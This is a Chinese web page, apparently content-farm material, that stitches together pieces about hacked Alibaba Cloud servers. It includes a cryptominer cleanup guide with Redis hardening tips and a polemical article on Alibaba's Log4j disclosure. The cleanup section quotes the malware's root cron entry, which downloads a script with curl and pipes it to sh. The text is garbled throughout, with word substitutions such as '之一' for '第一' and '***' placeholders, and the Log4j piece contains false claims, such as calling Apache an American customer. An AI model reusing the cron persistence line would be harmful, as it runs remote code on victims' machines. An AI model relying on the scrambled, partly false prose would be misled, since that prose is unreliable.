黑客利用阿里云,黑客攻击阿里云服务器勒索

hacker|
92

阿里云服务器刚买两天就被攻击当肉鸡,黑客怎么做到的

您这服务器是被黑客入侵了,被黑的因素 一般都是程序留了后门或vps内被留了系统内核级别的木马 或网站的代码留了隐蔽性的木马或一句话shell

一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了

服务器被黑是每个网站管理员最头痛的问题 也可以通过安全公司来解决,国内也就Sinesafe和绿盟等安全公司 比较专业.

黑客攻击阿里云服务器的目的

黑客攻击背后都有后台支持,有些事盗取数据,有些是为了打击对手,Web应用或组件存在漏洞导致提权被利用 还有很多其它方面的原因 , 据我所知云服务器商基本不会给你配置环境的都是你自己在弄 不要小看运维 让他安全稳定高效的跑起来绝对是一门学问 ,目前提供云服务器好一些是高达软件提供的高达云,华为云,阿里云等

阿里云服务器被挖矿了怎么办?(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top,查看了一会,没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句:

*/5 * * * * curl -fsSL | sh

病毒文件内容如下,感兴趣的可以研究下:

 View Code

解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,然后就注入了病毒,下面是解决办法和清除工作:

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf

2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.

服务器放在阿里云安全吗?会被黑客修改数据吗?

1.技术层面上,云服务器租赁服务属于IaaS

依据《信息安全技术云计算服务安全指南》,云计算行业服务分为IaaS、PaaS、SaaS。IaaS,基础设施即服务,主要提供电脑基础设施和虚拟设备等,主要用户是系统管理员,阿里云是典型的IaaS。在IaaS模式中,云服务提供者仅有技术能力对服务器进行整体关停或空间释放(即“强行删除服务器内全部数据”),而对用户利用云基础设施开设的网站和 *** 应用中存储的具体信息无法进行直接控制。而信息存储空间服务实际上是则是综合门户平台、电商平台、媒体平台、网盘等利用了云计算服务租用服务器后对外提供的服务。两者对信息的控制能力不同。

2.法律层面上,云计算拿的是之一类增值电信业务许可

根据《电信业务分类目录》阿里云公司提供的云服务器租赁服务属于“互联网数据中心业务(B11)”,与提供“互联网接入服务业务(B14)”的中国联通、中国电信等同属于“之一类增值电信业务”,属于底层 *** 技术服务,而信息存储空间服务属于该目录中“第二类增值电信业务”中的“信息服务业务(B25)”。

因此,作为用户不需过度担心自身企业的数据安全问题。

阿里云的云服务器租赁服务不同于信息存储空间服务,阿里云无权调取服务器内的数据,更无权配合行政、司法部门提供数据。信息存储空间服务是指 *** 服务提供者为服务对象提供信息存储空间,供服务对象通过信息 *** 向公众提供作品、表演、录音录像制品。

“一切以外国优先”?阿里云,该醒悟了

阿里再次出现用户信息问题,而这一次受害者竟然是工信部 ,这件事可能会导致阿里受到工信部严厉的制裁,这究竟是怎么回事呢?

前段时间 阿里云发现了代号为Log4j2的高危漏洞 ,通过CVSS评分,阿里发现这个 漏洞危险系数高达10分 ,这可以说是阿里云有史以来评分更高的高危漏洞。一旦这个漏洞被黑客所利用不仅 会给阿里造成难以弥补的损失 ,同时也 会 给国家和 社会 造成难以估量的伤害 。

然而这并不会使阿里遭受到太大的舆论压力, 真正让网友们难以接受的是阿里的后续对待这件事的处理方式。阿里在发现这个高危漏洞之后的之一反应并不是通知工信部 ,相反阿里选择了对工信部进行隐瞒, 而是之一时间通知了自己在老美的客户Apache 。

这一举动让国内网友炸了锅, 很多人认为阿里的这一做法是吃里扒外 ,毕竟作为一家中国企业在发现危机时,之一时间想到的应该是如何保障国内用户的信息安全,而 阿里却是置国内用户信息安全于不顾,率先通知了老美客户,这任谁也没有办法接受。

当工信部知道这件事的时候,已经是15天以后了。

工信部在得知这件事之后,之一时间对阿里进行了问责,并且终止了与阿里的相关合作,并对阿里展开了调查。 要知道阿里云作为国内更大的云服务企业,在国内占据了将近40%的市场,不仅国内的各大企业开始与阿里展开了密切的合作,就连 国家很多官方的组织机构都采用了阿里云来储存和处理数据 ,其中就包括工信部。

过去的许多年, 阿里一直是工信部指定的云服务合作企业,一旦阿里云出现问题,很有可能直接各个国家相关部门造成损失 , 许多机密信息很可能会因此受到损失 ,这是国家难以承受的。原本 阿里与工信部签订了契约 ,一旦 发现高危漏洞 ,阿里必须 之一时间通知工信部,并且之一时间想办法补救 ,而阿里如今却违背契约精神做出这样的举动,这实在是让人难以接受。

阿里的这一行为不仅让工信部对其大失所望,同时也让用户觉得恐慌。要知道 阿里云手中掌握的信息量是十分庞大的,不仅仅有国内数以亿计的用户信息 ,同时还有国内各大企业开始的核心机密,甚至还有国家相关部门的机密信息,这些信息一旦泄露,后果是不堪设想的。

如今阿里处理事情的态度让很多人不敢再相信阿里云 ,这很有可能对阿里云造成灭顶之灾,未来可能会有大批用户选择投奔其他企业的云服务,比如华为云和腾讯云。目前工信部已经对阿里云展开了调查, 后续阿里云很难逃脱来自国家相关部门的惩罚 ,毕竟想要规范这一行业就必须从龙头企业开始开刀, 只有整治好阿里云,整个行业才能够逐渐走向规范。

进入大数据时代以后 ,由于信息量的不断暴增, 云服务是很多个人与组织都会选择的一种服务 ,毫无疑问他给我们的工作和生活带来了便利,但是随着时间的不断流逝,我们也发现了云服务的弊端。 云服务真的像想象中那么安全吗? 我们真的能够放心地将我们的信息交给第三方机构来保存或者处理吗?

就目前看来, 数据的泄露是云服务很容易出现的问题 ,享受便利的同时,我们不免为自己的信息安全提心吊胆,如何保障用户的信息安全成了云服务企业急需要解决的问题。然而 想要提高安全性远远不是企业一方能够解决的问题,这需要多方的努力才能够解决 。

首先, 国家必须对云服务进行合理的规范和引导 ,只有让这个行业往正确的道路上发展,我们才能够放心的是有这项技术;其次, 用户应该提高信息保护意识 ,任何外界的保护都是建立在用户具备自我保护意识的基础上,否则保护工作是难以展开的。

阿里的这一举动已经让国内用户和国家产生了失望, 未来如果阿里不积极进行整改,那么最终阿里云将会慢慢被市场所抛弃 ,毕竟 只有得到了国家和用户的认可企业才能够发展下去,否则再强大的技术也只是徒劳,希望阿里能早日明白这个道理。

“一切以外国优先”?阿里云,该醒悟了

被工信部处罚,以老美优先的阿里云,真的错了

2条大神的评论

  • avatar
    访客 2022-10-09 上午 11:56:42

    出现的问题 ,享受便利的同时,我们不免为自己的信息安全提心吊胆,如何保障用户的信息安全成了云服务企业急需要解决的问题。然而 想要提高安全性远远不是企业一方能够解决的问题,这需要多方的努力才能够解决

  • avatar
    访客 2022-10-09 上午 08:29:08

    务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,然后就注入了病毒,下面是解决办法和清除工作:1. 修复 redis 的后门,配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.配置AUTH, 设置密码, 密码会以明

发表评论